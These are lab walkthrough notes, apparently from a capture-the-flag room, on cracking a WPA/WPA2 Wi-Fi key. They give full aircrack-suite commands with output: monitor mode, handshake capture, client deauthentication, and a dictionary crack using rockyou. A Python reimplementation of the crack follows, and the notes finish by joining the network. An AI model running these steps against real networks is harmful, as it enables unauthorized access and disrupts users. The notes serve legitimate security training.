WPA/WPA2 CRACKING

root@thm:~$ ssh [email protected]

#set the link to monitor mode
glitch@wifi:~$ sudo ip link set dev wlan2 down
glitch@wifi:~$ sudo iw dev wlan2 set type monitor
glitch@wifi:~$ sudo ip link set dev wlan2 up
glitch@wifi:~$ sudo iw dev wlan2 info

#start capturing traffic and targets
glitch@wifi:~\tab1$ sudo airodump-ng wlan2
 * By default, airodump-ng will automatically switch the selected wireless interface into monitor mode if the interface supports it.
   BSSID              STATION            PWR   Rate    Lost    Frame  Notes  Probes
   02:00:00:00:00:00  02:00:00:00:01:00  -29    0 - 1      0        1
 * the STATION column shows the MAC address (02:00:00:00:01:00) of a client that is connected to the access point; the BSSID column is the access point's MAC.

glitch@wifi:~\tab1$ CTRL+C
 * stop traffic capture once a target BSSID is acquired
 
#capture 4-way handshakes
glitch@wifi:~\tab1$ sudo airodump-ng -c 6 --bssid 02:00:00:00:00:00 -w output-file wlan2
 * This command targets the specific network channel and MAC address (BSSID) of the access point for which you want to capture the traffic and saves the information to a few files that start with the name output-file.
    - These files will be used to crack the PSK
 * -c represents the channel
 * --bssid represents the AP
 
 * It is important to leave this command running until the attack is finished
 ...
  CH  6 ][ Elapsed: 7 mins ][ 2024-12-13 00:34 ][ WPA handshake: 02:00:00:00:00:00 

#deauthenticate the connected client(s)
glitch@wifi:~\tab2$ sudo aireplay-ng -0 1 -a 02:00:00:00:00:00 -c 02:00:00:00:01:00 wlan2
 CH  6 ][ Elapsed: 7 mins ][ 2024-12-13 00:34 ][ WPA handshake: 02:00:00:00:00:00 
 
 * this command deauthenticates the connected client
    - the airodump-ng command still running in tab1 will then capture the 4-way handshake as soon as the client reconnects to the AP
 * The -0 flag selects the deauthentication attack
 * The 1 value is the number of deauth frames to send
 * The -a indicates the BSSID of the access point
 * The -c indicates the MAC address of the client to deauthenticate

# once the "WPA handshake" notice appears, the monitoring can be stopped
glitch@wifi:~\tab1$ CTRL+C
 * monitoring MUST be stopped because it won't be possible to join the Wi-Fi network while airodump-ng is running 
   in monitor mode
#crack the PSK offline against the captured handshake
glitch@wifi:~\tab1$ sudo aircrack-ng -a 2 -b 02:00:00:00:00:00 -w /home/glitch/rockyou.txt output*cap
 * The -a 2 flag indicates the WPA/WPA2 attack mode
 * The -b indicates the BSSID of the access point
 * The -w flag indicates the dictionary (wordlist) to use for the attack

 * KEY FOUND! [ fluffy/champ24 ]

 * If you get the message "no EAPOL data; unable to process this AP", it means that you
    ran aircrack-ng before the handshake was captured, or that the handshake was never captured at all
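What aircrack-ng -a 2 is doing per wordlist entry, as an added Python example (not part of the original notes or of the aircrack-ng project): derive the PSK with PBKDF2 (the same value wpa_passphrase prints), expand it to the KCK, and compare the EAPOL Key MIC. The SSID, MACs and passphrase are taken from the notes above; the nonces and EAPOL bytes are constructed placeholders, not a real capture. The 4096 PBKDF2 rounds per guess are the only cost an attacker pays, so a passphrase that is not in any wordlist is the defence.

```python
import hashlib
import hmac


def wpa_psk(ssid: str, passphrase: str) -> bytes:
    """PSK/PMK exactly as wpa_passphrase prints it: PBKDF2-HMAC-SHA1, 4096 rounds, 32 bytes."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_kck(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """First 16 bytes of the PTK (the KCK) from the 802.11i PRF-512 expansion."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    ptk = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4))
    return ptk[:16]


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes) -> bytes:
    """WPA2 (AES/CCMP) Key MIC: HMAC-SHA1 over the EAPOL-Key frame, truncated to 16 bytes."""
    return hmac.new(kck, eapol_mic_zeroed, hashlib.sha1).digest()[:16]


def crack_handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol_mic_zeroed, mic, wordlist):
    """Dictionary check as aircrack-ng -a 2 performs it; returns the matching passphrase or None."""
    for candidate in wordlist:
        kck = ptk_kck(wpa_psk(ssid, candidate), ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, eapol_mic_zeroed), mic):
            return candidate
    return None


# Constructed sample handshake: MACs and passphrase come from the notes above; the nonces
# and the EAPOL message-2 bytes (MIC field zeroed) are made up, not captured from a network.
AP_MAC = bytes.fromhex("020000000000")
STA_MAC = bytes.fromhex("020000000100")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
EAPOL_M2_ZEROED = b"\x01\x03\x00\x75\x02\x01\x0a" + b"\x00" * 110
TRUE_MIC = eapol_mic(ptk_kck(wpa_psk("MalwareM_AP", "fluffy/champ24"),
                             AP_MAC, STA_MAC, ANONCE, SNONCE), EAPOL_M2_ZEROED)


def demo():
    wordlist = ["password", "123456", "fluffy/champ24", "letmein"]
    return crack_handshake("MalwareM_AP", AP_MAC, STA_MAC, ANONCE, SNONCE,
                           EAPOL_M2_ZEROED, TRUE_MIC, wordlist)


if __name__ == "__main__":
    print("KEY FOUND!", demo())
```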
 

glitch@wifi:~$ wpa_passphrase MalwareM_AP 'ENTER PSK HERE' > config
 network={
  ssid="MalwareM_AP"
  #psk="fluffy/champ24"
  psk=b6539a718cc4745fe326498237746509bec562ce43c468a7b48f8ce698ee1ccb
 }

glitch@wifi:~$ sudo wpa_supplicant -B -c config -i wlan2
 Successfully initialized wpa_supplicant
 rfkill: Cannot get wiphy information
  * If you get an "rfkill: Cannot get wiphy information" error, you can ignore it.
     - You will also notice that wpa_supplicant has automatically switched the wlan2 interface back to managed mode.

#verify
glitch@wifi:~$ iw dev
 phy#2
  Unnamed/non-netdev interface
   wdev 0x200000002
   addr 42:00:00:00:02:00
   type P2P-device
   txpower 20.00 dBm
 Interface wlan2
  ifindex 5
   wdev 0x200000001
   addr 02:00:00:00:02:00
   ssid MalwareM_AP
   type managed
   channel 6 (2437 MHz), width: 20 MHz (no HT), center1: 2437 MHz
   txpower 20.00 dBm
